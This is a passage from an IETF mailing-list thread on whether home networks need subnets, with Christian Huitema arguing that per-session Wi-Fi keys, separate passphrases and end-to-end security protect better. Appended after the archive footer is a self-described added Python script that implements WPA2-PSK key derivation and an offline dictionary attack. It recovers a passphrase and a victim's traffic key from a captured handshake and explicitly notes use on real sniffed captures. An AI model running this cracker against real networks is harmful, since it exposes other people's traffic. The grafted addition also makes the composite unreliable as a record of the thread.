subnets have proven to be a useful tool in the past, and may prove so again in the future, even if the reasons for future use are different than those for past and present use. I don't see why we should constrain the network architecture to deny use of this tool to ordinary users.

Keith

>> Assume we agree on the needed functionality. It is hard to
>> disagree and many of us have seen the need to isolate some
>> people and apparatus from others, and to assign different
>> capability to them, for many years.
>>
>
> People want security, and the threats that Michael mentions are real:
> children spying on the parents' traffic, guests abusing the access to do
> something illegal on the Internet. But subnets are not a particularly
> efficient way of solving these threats.
>
> Take the issue of guests abusing the privilege and engaging in illegal
> action. The concrete risk is that men in black will knock at your door
> and ask about said actions. Picture yourself arguing that "it obviously
> wasn't me, because the packets come from the network that I provide to
> my guests". The men in black will not be impressed, since you obviously
> have access to all the networks in your house. Your only defense will be
> to rat out a specific guest, supposing of course that you are so inclined.
> Subnet or no subnet will not help you do that. Access control and logs
> will help, but these are not tied to subnets.
>
> Consider then the attacks between computers on the same network. Michael
> mentioned traffic snooping. But modern Wi-Fi networks are protected
> against that already. They negotiate different per-session keys. Even in
> promiscuous mode, the Wi-Fi card does not see the unicast traffic of the
> other stations in the network. In home networks, the key is derived from
> an initial 4-way handshake, secured by a pass-phrase. Most deployments
> use a single pass-phrase today, so teenagers could indeed develop tools
> to crack the exchange. But nothing prevents using different pass-phrases
> for different groups of users.
>
> The other risks are the active attacks between connected computers.
> However, as John pointed out, there is a lot of demand for connectivity
> between computers in the home. Many people have tried to engineer
> network topologies that follow organization or authorization boundaries,
> but mostly that makes your network expensive to run without really
> solving the issues.
>
> Also, ultimately, all forms of topology-based control rely on the
> security of the home router. Do you really believe that a teenager who
> is clever enough to hack into Wi-Fi access protections will not also be
> able to hack into the home router?
>
> If we want actual protection, it is probably much easier to use end-to-end
> security. And in your own house, you might consider forms of social
> control, as in "OK, you hacked my computer, give me the keys of your
> car..."
>
> Frankly, I don't see users managing subnets any time soon.
>
> -- Christian Huitema
>
> _______________________________________________
> Ietf mailing list
> Ietf@xxxxxxxx
> https://www1.ietf.org/mailman/listinfo/ietf
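The per-session key point in Christian's message above deserves a concrete look: under WPA2-PSK the pairwise key is derived from the passphrase plus the addresses and nonces exchanged in the 4-way handshake, so anyone who knows (or guesses) the passphrase and captures that handshake can recompute another station's key, while a station holding a different passphrase cannot. The following is an added example, not code from the thread or from any IETF document; the SSID, MAC addresses, nonces, passphrases and wordlist are constructed sample values, the EAPOL frame layout is simplified, and the MIC is the key-descriptor-version-2 (HMAC-SHA1-128) form.

```python
"""WPA2-PSK key derivation and an offline dictionary check on a captured
4-way handshake.  Added example; all sample values are constructed."""
import hashlib
import hmac

# Constructed sample network (not real devices).
SSID = "HomeNet"
AP_MAC = bytes.fromhex("001122334455")   # AA  (authenticator address)
STA_MAC = bytes.fromhex("66778899aabb")  # SPA (supplicant address)
ANONCE = bytes.fromhex("11" * 32)        # fixed here; random in a real handshake
SNONCE = bytes.fromhex("22" * 32)
FAMILY_PASSPHRASE = "correct horse battery"   # weak on purpose: it is in the wordlist
GUEST_PASSPHRASE = "guest-only-J7#qP0zL!m"    # separate passphrase for guests
WORDLIST = ["password", "12345678", "correct horse battery", "letmein1"]


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_384(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion",
    min(AA,SPA)||max(AA,SPA)||min(ANonce,SNonce)||max(ANonce,SNonce)).
    PRF-384 is HMAC-SHA1 in counter mode: three 20-byte blocks, cut to 48 bytes."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(3):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:48]


def split_ptk(ptk: bytes):
    """CCMP layout: KCK (16, signs EAPOL frames), KEK (16), TK (16, encrypts data)."""
    return ptk[:16], ptk[16:32], ptk[32:48]


def eapol_mic(kck: bytes, frame_with_zero_mic: bytes) -> bytes:
    """Descriptor version 2 MIC: HMAC-SHA1 over the frame, truncated to 16 bytes."""
    return hmac.new(kck, frame_with_zero_mic, hashlib.sha1).digest()[:16]


def build_frame2(snonce: bytes) -> bytes:
    """Constructed, simplified message-2 body: a fixed header, the SNonce,
    then 16 zero bytes where the MIC is placed (the MIC is computed over this)."""
    return b"\x02\x03\x00\x5f\x02\x01\x0a" + snonce + bytes(16)


def station_handshake(passphrase, ssid, aa, spa, anonce, snonce):
    """Everything a sniffer sees: addresses, nonces and the MIC'd frame, but
    neither the passphrase nor the derived keys."""
    kck, _, _ = split_ptk(prf_384(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce))
    frame = build_frame2(snonce)
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "frame": frame, "mic": eapol_mic(kck, frame)}


def recover_keys(capture, passphrase):
    """Return (KCK, KEK, TK) if `passphrase` reproduces the captured MIC, else None."""
    pmk = pmk_from_passphrase(passphrase, capture["ssid"])
    kck, kek, tk = split_ptk(prf_384(pmk, capture["aa"], capture["spa"],
                                     capture["anonce"], capture["snonce"]))
    if hmac.compare_digest(eapol_mic(kck, capture["frame"]), capture["mic"]):
        return kck, kek, tk
    return None


def crack(capture, candidates):
    """Offline dictionary attack: the first candidate that verifies, or None."""
    for pw in candidates:
        if recover_keys(capture, pw) is not None:
            return pw
    return None


if __name__ == "__main__":
    cap = station_handshake(FAMILY_PASSPHRASE, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE)
    print("cracked family passphrase:", crack(cap, WORDLIST))
    # With the recovered passphrase the victim's traffic key (TK) is recomputable.
    print("victim TK:", recover_keys(cap, FAMILY_PASSPHRASE)[2].hex())
    # A guest holding a different passphrase cannot derive the family station's keys.
    print("guest passphrase derives family keys:", recover_keys(cap, GUEST_PASSPHRASE) is not None)
```

The station side is simulated here only to produce a capture to attack; against a real network the same `recover_keys` logic runs over a sniffed handshake, and the cost of each guess is dominated by the 4096-round PBKDF2, which is why short passphrases fall to wordlists and why handing guests their own passphrase keeps the family stations' keys out of their reach.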